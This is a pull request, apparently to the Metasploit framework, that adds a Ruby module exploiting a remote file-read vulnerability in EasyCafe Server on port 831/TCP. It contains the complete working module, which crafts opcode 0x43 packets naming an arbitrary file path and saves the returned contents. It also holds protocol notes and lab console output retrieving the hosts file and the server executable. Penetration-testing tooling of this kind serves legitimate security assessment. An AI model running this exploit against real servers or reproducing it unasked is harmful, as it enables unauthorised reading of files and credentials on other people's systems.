### PR TITLE
Add EasyCafe Server Remote File Access module

### DIFF
--- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'EasyCafe Server Remote File Access',
+      'Description' => %q{
+          This module exploits a file retrieval vulnerability in
+        EasyCafe Server. The vulnerability can be triggered by
+        sending a specially crafted packet (opcode 0x43) to the
+        831/TCP port.
+        This module has been successfully tested on EasyCafe Server
+        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
+        and Windows 7 SP1.
+        Note that the server will throw a popup messagebox if the
+        specified file does not exist.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      =>
+        [
+          'R-73eN', # Vulnerability Discovery
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
+        ],
+      'References'  =>
+        [
+          [ 'EDB', '39102' ]
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(831),
+        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error('Please supply the name of the file you want to download')
+      return
+    end
+
+    file_path = datastore['FILEPATH']
+    packet = "\x43"
+    packet << file_path
+    packet << "\x00" * (255 - file_path.length)
+    packet << "\x01\x00\x00\x00\x01"
+
+    vprint_status("#{peer} - Sending request (#{packet.length} bytes)")
+    connect
+    sock.put(packet)
+    res = sock.get(15)
+    disconnect
+    unless res
+      print_error("#{peer} - Unable to retrieve file due to a timeout.")
+      return
+    end
+    vprint_status("#{peer} - Received response (#{res.length} bytes)")
+
+    # Extract file contents
+    # Content begins after \x00\x01
+    contents = res.sub(/\A.*?\x00\x01/m, '').to_s
+    if contents.nil? || contents.empty?
+      print_error("#{peer} - Unexpected reply. Unable to extract contents")
+      return
+    end
+    print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!")
+    path = store_loot(
+      'easycafe_server',
+      'application/octet-stream',
+      ip,
+      contents,
+      File.basename(file_path)
+    )
+    print_status("File saved in: #{path}")
+  end
+end

--- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -53,7 +53,7 @@ class Metasploit4 < Msf::Auxiliary
     vprint_status("#{peer} - Sending request (#{packet.length} bytes)")
     connect
     sock.put(packet)
-    res = sock.get(15)
+    res = sock.get
     disconnect
     unless res
       print_error("#{peer} - Unable to retrieve file due to a timeout.")

--- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -44,11 +44,6 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
-      print_error('Please supply the name of the file you want to download')
-      return
-    end
-
     file_path = datastore['FILEPATH']
     packet = "\x43"
     packet << file_path

--- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -45,6 +45,11 @@ class Metasploit4 < Msf::Auxiliary
 
   def run_host(ip)
     file_path = datastore['FILEPATH']
+    if file_path.length > 67
+      print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.")
+      return
+    end
+
     packet = "\x43"
     packet << file_path
     packet << "\x00" * (255 - file_path.length)


### PR DESCRIPTION
This module exploits a file retrieval vulnerability in EasyCafe Server.

Tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1.
- Software: hxxp://www.tinasoft.com/Download/easysetup.exe
- EDB: https://www.exploit-db.com/exploits/39102/

Note: This module makes use of the service listening on 831/TCP. The exploit-db exploit makes use of 831/UDP, however the service did not appear to listen on this port in the default configuration on Windows XP or Windows 7.

Note: The server response includes the file name and file path before the file content, however these strings appear to be buffered (with 0x00) with inconsistent length. The headers are terminated, and the file content begins, after the first instance of `\x00\x01`. Rather than parse the length for the file name, file path and file contents, this module simply grabs all content after the first instance of `\x00\x01`, like so:

```
res.sub(/\A.*?\x00\x01/m, '').to_s
```

This works reliably, however, at a guess, this may cause a miss-match if the file name or file path contain UTF-8.
### Example Usage

Test retrieving hosts file:

```
msf > use auxiliary/scanner/misc/easycafe_server_fileaccess 
msf auxiliary(easycafe_server_fileaccess) > set rhosts 172.16.191.135
rhosts => 172.16.191.135
msf auxiliary(easycafe_server_fileaccess) > run

[*] 172.16.191.135:831 - File retrieved successfully (734 bytes)!
[*] File saved in: /root/.msf4/loot/20151227063619_default_172.16.191.135_easycafe_server_824615.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Test retrieving hosts file (verbose):

```
msf auxiliary(easycafe_server_fileaccess) > set verbose true
verbose => true
msf auxiliary(easycafe_server_fileaccess) > run

[*] 172.16.191.135:831 - Sending request (261 bytes)
[*] 172.16.191.135:831 - Received response (995 bytes)
[*] 172.16.191.135:831 - File retrieved successfully (734 bytes)!
[*] File saved in: /root/.msf4/loot/20151227063627_default_172.16.191.135_easycafe_server_657354.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Test retrieving binary data (EasyServer.exe):

```
msf auxiliary(easycafe_server_fileaccess) > set filepath "C:\\Program Files\\TinaSoft\\Easy Cafe Server\\EasyServer.exe"
filepath => C:\Program Files\TinaSoft\Easy Cafe Server\EasyServer.exe
msf auxiliary(easycafe_server_fileaccess) > run

[*] 172.16.191.135:831 - Sending request (261 bytes)
[*] 172.16.191.135:831 - Received response (2593541 bytes)
[*] 172.16.191.135:831 - File retrieved successfully (2593280 bytes)!
[*] File saved in: /root/.msf4/loot/20151227063641_default_172.16.191.135_easycafe_server_170358.exe
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(easycafe_server_fileaccess) > md5sum /root/.msf4/loot/20151227063641_default_172.16.191.135_easycafe_server_170358.exe
[*] exec: md5sum /root/.msf4/loot/20151227063641_default_172.16.191.135_easycafe_server_170358.exe

d27c723ed48575bb3a98f73bd251665f  /root/.msf4/loot/20151227063641_default_172.16.191.135_easycafe_server_170358.exe
```

Test retrieving non-existent file:

```
msf auxiliary(easycafe_server_fileaccess) > set filepath C:\\file\\does\\not\\exist.ext
filepath => C:\file\does\not\exist.ext
msf auxiliary(easycafe_server_fileaccess) > run

[*] 172.16.191.135:831 - Sending request (261 bytes)
[-] 172.16.191.135:831 - Unable to retrieve file due to a timeout.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Note: The server will pop a message box if the file doesn't exist;

![error](https://cloud.githubusercontent.com/assets/434827/12010193/0c59f8b2-acf1-11e5-9282-2a73f78332f5.png)
